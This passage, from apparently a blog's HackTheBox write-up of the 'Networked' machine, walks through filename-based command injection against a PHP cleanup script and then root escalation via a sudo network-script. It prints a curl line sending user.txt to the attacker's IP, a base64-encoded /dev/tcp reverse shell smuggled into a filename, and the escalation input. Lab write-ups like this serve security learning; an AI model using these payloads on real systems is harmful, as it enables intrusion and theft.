punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token function\">exec</span><span class=\"token punctuation\">(</span><span class=\"token string double-quoted-string\">\"nohup /bin/rm -f <span class=\"token interpolation\"><span class=\"token variable\">$path</span></span><span class=\"token interpolation\"><span class=\"token variable\">$value</span></span> > /dev/null 2>&amp;1 &amp;\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token keyword\">echo</span> <span class=\"token string double-quoted-string\">\"rm -f <span class=\"token interpolation\"><span class=\"token variable\">$path</span></span><span class=\"token interpolation\"><span class=\"token variable\">$value</span></span>\\n\"</span><span class=\"token punctuation\">;</span></code></pre></div>\n<p>So I tested it.</p>\n<p>On my local machine, I listen for ICMP:</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token function\">sudo</span> tcpdump -i tun0 icmp</code></pre></div>\n<p>Then on the remote server, I ran the following command, waited 3 minutes, and confirmed that command injection succeeded:</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token function\">touch</span> <span class=\"token string\">\"test.php &amp;&amp; ping 10.10.14.2\"</span></code></pre></div>\n<p>Now I steal <code class=\"language-text\">user.txt</code>.</p>\n<p>By creating the following file, I can send a GET request to my own server with the contents of <code class=\"language-text\">user.txt</code> as a query parameter, and retrieve the flag:</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token function\">touch</span> <span class=\"token string\">\"test.php &amp;&amp; curl 10.10.14.2?flag=\\<span class=\"token variable\"><span class=\"token variable\">`</span><span class=\"token function\">cat</span> user.txt<span class=\"token punctuation\">\\</span><span class=\"token variable\">`</span></span>\"</span></code></pre></div>\n<p>Since Linux filenames cannot contain <code class=\"language-text\">/</code>, this roundabout command is necessary.</p>\n<h3 id=\"getting-a-user-level-shell\" style=\"position:relative;\"><a href=\"#getting-a-user-level-shell\" aria-label=\"getting a user level shell permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Getting a User-Level Shell</h3>\n<p>Next I want to get root, but first I’ll secure a user-level shell.</p>\n<p>Although slashes cannot be used in filenames, I work around this with Base64.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token builtin class-name\">echo</span> <span class=\"token string\">\"bash -c '/bin/bash -l > /dev/tcp/10.10.14.2/9999 0&lt;&amp;1 2>&amp;1'\"</span> <span class=\"token operator\">|</span> base64\n<span class=\"token comment\"># YmFzaCAtYyAnL2Jpbi9iYXNoIC1sID4gL2Rldi90Y3AvMTAuMTAuMTQuMi85OTk5IDA8JjEgMj4mMScK</span>\n\n<span class=\"token function\">touch</span> <span class=\"token string\">\"test.php &amp;&amp; echo YmFzaCAtYyAnL2Jpbi9iYXNoIC1sID4gL2Rldi90Y3AvMTAuMTAuMTQuMi85OTk5IDA8JjEgMj4mMScK | base64 -d > rev.sh &amp;&amp; bash rev.sh\"</span></code></pre></div>\n<p>By embedding Base64-encoded commands this way, arbitrary code can be executed without using slashes.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 492px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/7bf72bb340acda5567bf873227769f89/5c6e9/image-20220528161540242.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 35%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAAA/ElEQVQoz4VRSW7DMAz0h7zI1hbv8iK7dtIg/3/MVKQhIO0hPQzIIcjRkEq6rsXqF1hroZTCxVcMQ4e2bTBNDssyce5Dn3MD91DduRHrOqNpap7N8xwJJXV9gzGGi1qr0NDAaB1qGlJKRlVVMPbqEaLkmlIy9OvABYqiYCTzMuM8v/B8njjvBx6PA8exw41DiBsPWBaSyLKMXdAgxQjiUTTZNo/X6xv7tqLvOxbqhx71zfKaY+C0Km0Rhz8h8UFo3z3KskSapuzir5M0jVz8L7iEo25B1Ps5HH/mI1Mkd5TTB9A673f6KEhu6OARUl6RHBOikOAB8QvxoXf8AKbB5esQcWEfAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/7bf72bb340acda5567bf873227769f89/8ac56/image-20220528161540242.webp 240w,\n/static/7bf72bb340acda5567bf873227769f89/d3be9/image-20220528161540242.webp 480w,\n/static/7bf72bb340acda5567bf873227769f89/9d6da/image-20220528161540242.webp 492w\"\n              sizes=\"(max-width: 492px) 100vw, 492px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/7bf72bb340acda5567bf873227769f89/8ff5a/image-20220528161540242.png 240w,\n/static/7bf72bb340acda5567bf873227769f89/e85cb/image-20220528161540242.png 480w,\n/static/7bf72bb340acda5567bf873227769f89/5c6e9/image-20220528161540242.png 492w\"\n            sizes=\"(max-width: 492px) 100vw, 492px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/7bf72bb340acda5567bf873227769f89/5c6e9/image-20220528161540242.png\"\n            alt=\"image-20220528161540242\"\n            title=\"image-20220528161540242\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Checking sudo privileges, there is an obvious file <code class=\"language-text\">changename.sh</code>.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token function\">sudo</span> -l\nMatching Defaults entries <span class=\"token keyword\">for</span> guly on networked:\n    <span class=\"token operator\">!</span>visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,\n    env_reset, <span class=\"token assign-left variable\">env_keep</span><span class=\"token operator\">=</span><span class=\"token string\">\"COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS\"</span>,\n    <span class=\"token assign-left variable\">env_keep</span><span class=\"token operator\">+=</span><span class=\"token string\">\"MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE\"</span>,\n    <span class=\"token assign-left variable\">env_keep</span><span class=\"token operator\">+=</span><span class=\"token string\">\"LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES\"</span>,\n    <span class=\"token assign-left variable\">env_keep</span><span class=\"token operator\">+=</span><span class=\"token string\">\"LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE\"</span>,\n    <span class=\"token assign-left variable\">env_keep</span><span class=\"token operator\">+=</span><span class=\"token string\">\"LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY\"</span>,\n    <span class=\"token assign-left variable\">secure_path</span><span class=\"token operator\">=</span>/sbin<span class=\"token punctuation\">\\</span>:/bin<span class=\"token punctuation\">\\</span>:/usr/sbin<span class=\"token punctuation\">\\</span>:/usr/bin\n\nUser guly may run the following commands on networked:\n    <span class=\"token punctuation\">(</span>root<span class=\"token punctuation\">)</span> NOPASSWD: /usr/local/sbin/changename.sh</code></pre></div>\n<p>Looking at its contents, it appears to be a script that creates the network script <code class=\"language-text\">ifcfg-guly</code>.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token comment\"># changename.sh</span>\n<span class=\"token comment\">#!/bin/bash -p</span>\n<span class=\"token function\">cat</span> <span class=\"token operator\">></span> /etc/sysconfig/network-scripts/ifcfg-guly <span class=\"token operator\">&lt;&lt;</span> <span class=\"token string\">EoF\nDEVICE=guly0\nONBOOT=no\nNM_CONTROLLED=no\nEoF</span>\n\n<span class=\"token assign-left variable\">regexp</span><span class=\"token operator\">=</span><span class=\"token string\">\"^[a-zA-Z0-9_\\ /-]+$\"</span>\n\n<span class=\"token keyword\">for</span> <span class=\"token for-or-select variable\">var</span> <span class=\"token keyword\">in</span> NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO<span class=\"token punctuation\">;</span> <span class=\"token keyword\">do</span>\n        <span class=\"token builtin class-name\">echo</span> <span class=\"token string\">\"interface <span class=\"token variable\">$var</span>:\"</span>\n        <span class=\"token builtin class-name\">read</span> x\n        <span class=\"token keyword\">while</span> <span class=\"token punctuation\">[</span><span class=\"token punctuation\">[</span> <span class=\"token operator\">!</span> <span class=\"token variable\">$x</span> <span class=\"token operator\">=~</span> <span class=\"token variable\">$regexp</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">;</span> <span class=\"token keyword\">do</span>\n                <span class=\"token builtin class-name\">echo</span> <span class=\"token string\">\"wrong input, try again\"</span>\n                <span class=\"token builtin class-name\">echo</span> <span class=\"token string\">\"interface <span class=\"token variable\">$var</span>:\"</span>\n                <span class=\"token builtin class-name\">read</span> x\n        <span class=\"token keyword\">done</span>\n        <span class=\"token builtin class-name\">echo</span> <span class=\"token variable\">$var</span><span class=\"token operator\">=</span><span class=\"token variable\">$x</span> <span class=\"token operator\">>></span> /etc/sysconfig/network-scripts/ifcfg-guly\n<span class=\"token keyword\">done</span>\n/sbin/ifup guly0</code></pre></div>\n<p>Since network scripts can have commands embedded directly, embedding <code class=\"language-text\">bash</code> or similar will launch a shell with root privileges, allowing me to obtain the flag.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token punctuation\">[</span>guly@networked .ssh<span class=\"token punctuation\">]</span>$ <span class=\"token function\">sudo</span> /usr/local/sbin/changename.sh\n<span class=\"token function\">sudo</span> /usr/local/sbin/changename.sh\ninterface NAME:\n<span class=\"token function\">bash</span>\n///\n<span class=\"token punctuation\">[</span>root@networked network-scripts<span class=\"token punctuation\">]</span><span class=\"token comment\"># cd /root</span></code></pre></div>\n<p>Reference: <a href=\"https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&#x26;qid=e026a0c5f83df4fd532442e1324ffa4f\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Redhat/CentOS root through network-scripts - Exploit</a></p>\n<h2 id=\"summary\" style=\"position:relative;\"><a href=\"#summary\" aria-label=\"summary permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Summary</h2>\n<p>I finally got back to solving machines after a while.</p>\n<p>I plan to keep going at a steady pace.</p>","fields":{"slug":"/hackthebox-linux-networked-en","tagSlugs":["/tag/hack-the-box-en/","/tag/linux-en/","/tag/easy-box-en/","/tag/english/"]},"frontmatter":{"date":"2022-05-25","description":"A writeup of the retired HackTheBox machine 'Networked'.","tags":["HackTheBox (en)","Linux (en)","EasyBox (en)","English"],"title":"HackTheBox Writeup: Networked (Easy/Linux)","socialImage":{"publicURL":"/static/9ee14b399a3899c36af904fbeee16cdb/hackthebox-linux-networked.png"}}}},"pageContext":{"slug":"/hackthebox-linux-networked-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}